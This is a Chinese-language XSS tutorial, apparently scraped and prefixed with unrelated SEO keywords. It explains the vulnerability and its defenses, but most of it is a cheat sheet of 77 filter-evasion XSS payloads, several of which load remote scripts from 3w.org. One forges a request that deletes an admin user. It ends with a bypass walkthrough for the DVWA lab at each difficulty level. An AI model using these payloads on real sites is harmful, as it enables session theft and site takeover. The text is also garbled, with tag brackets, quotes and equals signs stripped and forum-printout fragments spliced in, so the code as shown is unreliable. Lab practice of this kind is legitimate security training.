怎么仿网站链接,株洲网络,高端网站设计欣赏,视频网站如何赚钱xss漏洞 xss漏洞介绍危害防御方法xss测试语句xss攻击语句1. 反射性xss2.存储型xss3.DOM型xssdvwa靶场各等级渗透方法xss反射型#xff08;存储型方法一致#xff09;LowMediumHightimpossible Dom型LowMediumHight xss漏洞介绍
定义#xff1a;XSS 攻击全称跨站脚本攻击存储型方法一致LowMediumHightimpossible Dom型LowMediumHight xss漏洞介绍
定义XSS 攻击全称跨站脚本攻击是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆故将跨站脚本攻击缩写为 XSSXSS 是一种在 web 应用中的计算机安全漏洞它允许恶意 web 用户将代码植入到 web 网站里面供给其它用户访问当用户访问到有恶意代码的网页就会产生 xss 攻击。
危害
1、盗取各类用户帐号如机器登录帐号、用户网银帐号、各类管理员帐号 2、控制企业数据包括读取、篡改、添加、删除企业敏感数据的能力 3、盗窃企业重要的具有商业价值的资料 4、非法转账 5、强制发送电子邮件 6、网站挂马 7、控制受害者机器向其它网站发起攻击 等
防御方法
XSS 防御的总体思路是对输入(和 URL 参数)进行过滤对输出进行编码。
xss测试语句
检测网站xss漏洞时输入一些前端标签查看网站源码是否过滤如果没有过滤大概率会存在xss漏洞
输入h11/h1常用的测试语句
h51/h5
span1/span
scriptalert(1)/script
javascript:alert(1)
img src1 onerroralert(1)
scriptconsole.log(1);/script
闭合
spanx/span
spanx/span
单行注释
spanx/span//xss攻击语句
scriptalert(1)/script
svg onloadalert(1)
a hrefjavascript:alert(1)
a hrefjavascript:alert(1)aa/a
(1)普通的 XSS JavaScript 注入
SCRIPT SRChttp://3w.org/XSS/xss.js/SCRIPT
(2)IMG 标签 XSS 使用 JavaScript 命令
IMG SRChttp://3w.org/XSS/xss.js/
(3)IMG 标签无分号无引号
IMG SRCjavascript:alert(XSS)
(4)IMG 标签大小写不敏感
IMG SRCJaVaScRiPt:alert(XSS)
(5)HTML 编码(必须有分号)
IMG SRCjavascript:alert(XSS)
(6)修正缺陷 IMG 标签
IMG SCRIPTalert(XSS)/SCRIPT
(7)formCharCode 标签(计算器)
IMG SRCjavascript:alert(String.fromCharCode(88,83,83))
(8)UTF-8 的 Unicode 编码(计算器)
IMG SRCjav..省略..S)
(9)7 位的 UTF-8 的 Unicode 编码是没有分号的(计算器)
IMG SRCjav..省略..S)
(10)十六进制编码也是没有分号(计算器)
IMG SRC#x6A#x61#x76#x61..省略..#x58#x53#x53#x27#x29
(11)嵌入式标签,将 Javascript 分开
IMG SRCjav ascript:alert(XSS);
(12)嵌入式编码标签,将 Javascript 分开
IMG SRCjav ascript:alert(XSS);
(13)嵌入式换行符
IMG SRCjav ascript:alert(XSS);
(14)嵌入式回车
IMG SRCjav ascript:alert(XSS);
(15)嵌入式多行注入 JavaScript,这是 XSS 极端的例子
IMG SRCjavascript:alert(XSS)
(16)解决限制字符(要求同页面)
scriptzdocument./scriptscriptzzwrite(/scriptscriptzzscript/scripts
criptzz
srcht/scriptscriptzztp://ww/scriptscriptzzw.shell/scriptscriptzz.ne
t/1./scriptscriptzzjs/sc/scriptscriptzzript)/scriptscripteval_r(z)
/script
(17)空字符 12-7-1 T00LS - Powered by Discuz! Board
https://www.a.com/viewthread.php?actionprintabletid15267 2/6perl -e print IMG
SRCjava\0script:alert(\XSS\); out
(18)空字符 2,空字符在国内基本没效果.因为没有地方可以利用
perl -e print SCR\0IPTalert(\XSS\)/SCR\0IPT; out
(19)Spaces 和 meta 前的 IMG 标签
IMG SRC javascript:alert(XSS);
(20)Non-alpha-non-digit XSS
SCRIPT/XSS SRChttp://3w.org/XSS/xss.js/SCRIPT
(21)Non-alpha-non-digit XSS to 2
BODY onload!#$%()*~-_.,:;?[/|\]^alert(XSS)
(22)Non-alpha-non-digit XSS to 3
SCRIPT/SRChttp://3w.org/XSS/xss.js/SCRIPT
(23)双开括号
SCRIPTalert(XSS);///SCRIPT
(24)无结束脚本标记(仅火狐等浏览器)
SCRIPT SRChttp://3w.org/XSS/xss.js?B
(25)无结束脚本标记 2
SCRIPT SRC//3w.org/XSS/xss.js
(26)半开的 HTML/JavaScript XSS
IMG SRCjavascript:alert(XSS)
(27)双开角括号
iframe srchttp://3w.org/XSS.html
(28)无单引号 双引号 分号
SCRIPTa/XSS/alert(a.source)/SCRIPT
(29)换码过滤的 JavaScript
\;alert(XSS);//
(30)结束 Title 标签
/TITLESCRIPTalert(XSS);/SCRIPT
(31)Input Image
INPUT SRCjavascript:alert(XSS);
(32)BODY Image
BODY BACKGROUNDjavascript:alert(XSS)
(33)BODY 标签
BODY(XSS)
(34)IMG Dynsrc
IMG DYNSRCjavascript:alert(XSS)
(35)IMG Lowsrc
IMG LOWSRCjavascript:alert(XSS)
(36)BGSOUND
BGSOUND SRCjavascript:alert(XSS);
(37)STYLE sheet
LINK RELstylesheet HREFjavascript:alert(XSS);
(38)远程样式表
LINK RELstylesheet HREFhttp://3w.org/xss.css
(39)List-style-image(列表式)
STYLEli {list-style-image: url(javascript:alert(XSS));}/STYLEULLIXSS
(40)IMG VBscript
IMG SRCvbscript:msgbox(XSS)/STYLEULLIXSS
(41)META 链接 url
META HTTP-EQUIVrefresh CONTENT0;URLhttp://;URLjavascript:alert(XSS);
(42)Iframe
IFRAME SRCjavascript:alert(XSS);/IFRAME
(43)Frame
FRAMESETFRAME SRCjavascript:alert(XSS);/FRAMESET12-7-1 T00LS - Powered by Discuz!
Boardhttps://www.a.com/viewthread.php?actionprintabletid15267 3/6
(44)Table
TABLE BACKGROUNDjavascript:alert(XSS)
(45)TD
TABLETD BACKGROUNDjavascript:alert(XSS)
(46)DIV background-image
DIV STYLEbackground-image: url(javascript:alert(XSS))
(47)DIV background-image 后加上额外字符(1-3234391608192-8131228865279)
DIV STYLEbackground-image: url(javascript:alert(XSS))
(48)DIV expression
DIV STYLEwidth: expression_r(alert(XSS));
(49)STYLE 属性分拆表达
IMG STYLExss:expression_r(alert(XSS))
(50)匿名 STYLE(组成:开角号和一个字母开头)
XSS STYLExss:expression_r(alert(XSS))
(51)STYLE background-image
STYLE.XSS{background-image:url(javascript:alert(XSS));}/STYLEACLASSXSS/A
(52)IMG STYLE 方式
exppression(alert(XSS))
(53)STYLE background
STYLESTYLEtypetext/cssBODY{background:url(javascript:alert(XSS))}/STYLE
(54)BASE
BASE HREFjavascript:alert(XSS);//
(55)EMBED 标签,你可以嵌入 FLASH,其中包涵 XSS
EMBED SRChttp://3w.org/XSS/xss.swf /EMBED
(56)在 flash 中使用 ActionScrpt 可以混进你 XSS 的代码
aget;bURL(\;cjavascript:;dalert(XSS);\);eval_r(abcd);
(57)XML namespace.HTC 文件必须和你的 XSS 载体在一台服务器上
HTML xmlns:xss?import namespacexss
implementationhttp://3w.org/XSS/xss.htcxss:xssXSS/xss:xss/HTML
(58)如果过滤了你的 JS 你可以在图片里添加 JS 代码来利用
SCRIPT SRC/SCRIPT
(59)IMG 嵌入式命令,可执行任意命令
IMG SRChttp://www.a.com/a.php?ab
(60)IMG 嵌入式命令(a.jpg 在同服务器)
Redirect 302 /a.jpg http://www.XXX.com/admin.aspdeleteuser
(61)绕符号过滤
SCRIPT a SRChttp://3w.org/xss.js/SCRIPT
(62)SCRIPT SRChttp://3w.org/xss.js/SCRIPT
(63)SCRIPT a SRChttp://3w.org/xss.js/SCRIPT
(64)SCRIPT a SRChttp://3w.org/xss.js/SCRIPT
(65)SCRIPT a SRChttp://3w.org/xss.js/SCRIPT
(66)12-7-1 T00LS - Powered by Discuz! Board
https://www.a.com/viewthread.php?actionprintabletid15267 4/6SCRIPT a
SRChttp://3w.org/xss.js/SCRIPT
(67)SCRIPTdocument.write(SCRI);/SCRIPTPT SRChttp://3w.org/xss.js/SCRIPT
(68)URL 绕行
A HREFhttp://127.0.0.1/XSS/A
(69)URL 编码
A HREFhttp://3w.orgXSS/A
(70)IP 十进制
A HREFhttp://3232235521″XSS/A
(71)IP 十六进制
A HREFhttp://0xc0.0xa8.0×00.0×01″XSS/A
(72)IP 八进制
A HREFhttp://0300.0250.0000.0001″XSS/A
(73)混合编码
A HREFhttp://6 6.000146.0×7.147/XSS/A
(74)节省[http:]
A HREF//www.google.com/XSS/A
(75)节省[www]
A HREFhttp://google.com/XSS/A
(76)绝对点绝对 DNS
A HREFhttp://www.google.com./XSS/A
(77)javascript 链接
A HREFjavascript:document.locationhttp://www.google.com/XSS/A1. 反射性xss
特点 反射性xss是非持久化的需要欺骗用户去点击恶意链接才能触发xss代码。 通常攻击者会通过邮件或其他诱导方式将含有xss的恶意代码发送给目标用户当用户访问该链接时浏览器解析带有xss代码的恶意脚本后就会触发xss攻击
检测方法 输入框中输入
scriptalert(/xss漏洞/)/script2.存储型xss
特点 存储型xss是持久化代码会存储到服务器的数据库中当用户在个人信息或者其他输入文本等地方插入恶意代码。 当其他用户访问该页面就会触发代码执行造成xss攻击
检测方法 输入内容
scriptalert(/xss漏洞/)/script再次查看数据库中是否保存此信息
3.DOM型xss
特点 DOM型xss是一种特殊的反射性xss主要是通过利用输入内容使前端代码进行执行的方式达成xss攻击
检测方法 输入内容
javascript:alert(xss漏洞)代码分析 当我们在前端页面输入js代码时页面将会执行从而造成xss攻击
dvwa靶场各等级渗透方法
xss反射型存储型方法一致
Low
?phpheader (X-XSS-Protection: 0);// Is there any input?
if( array_key_exists( name, $_GET ) $_GET[ name ] ! NULL ) {// Feedback for end userecho preHello . $_GET[ name ] . /pre;
}?方法
scriptalert(1)/scriptMedium
?phpheader (X-XSS-Protection: 0);// Is there any input?
if( array_key_exists( name, $_GET ) $_GET[ name ] ! NULL ) {// Get input$name str_replace( script, , $_GET[ name ] ); ##将script替换为空// Feedback for end userecho preHello ${name}/pre;
}?方法
scriscriptptalert(1)/script #双写绕过
Scriptalert(1)/script # 大小写绕过
等方法Hight ?phpheader (X-XSS-Protection: 0);// Is there any input?
if( array_key_exists( name, $_GET ) $_GET[ name ] ! NULL ) {// Get input$name preg_replace( /(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i, , $_GET[ name ] ); #过滤掉了单个字符// Feedback for end userecho preHello ${name}/pre;
}?方法
img src1 onerroralert(1) #不使用script标签达到绕过效果impossible ?php// Is there any input?
if( array_key_exists( name, $_GET ) $_GET[ name ] ! NULL ) {// Check Anti-CSRF tokencheckToken( $_REQUEST[ user_token ], $_SESSION[ session_token ], index.php );// Get input$name htmlspecialchars( $_GET[ name ] );// Feedback for end userecho preHello ${name}/pre;
}// Generate Anti-CSRF token
generateSessionToken();?使用htmlspecialchars方法建立实体安全代码
Dom型
Low ?php# Dont need to do anything, protction handled on the client side?方法
?defaultscriptalert(1)/script #修改url内容Medium ?php// Is there any input?
if ( array_key_exists( default, $_GET ) !is_null ($_GET[ default ]) ) {$default $_GET[default];# Do not allow script tagsif (stripos ($default, script) ! false) {header (location: ?defaultEnglish);exit;}
}?方法
?default/selectimg src1 onerroralert(1) #闭合上个select标签 然后代码过滤了script使用img进行绕过Hight ?php// Is there any input?
if ( array_key_exists( default, $_GET ) !is_null ($_GET[ default ]) ) {# White list the allowable languagesswitch ($_GET[default]) {case French: #只能存在这四个选项中的其中一项才能执行case English:case German:case Spanish:# okbreak;default:header (location: ?defaultEnglish);exit;}
}?方法
?defaultFrench#scriptalert(1)/script #使用定位符进行绕过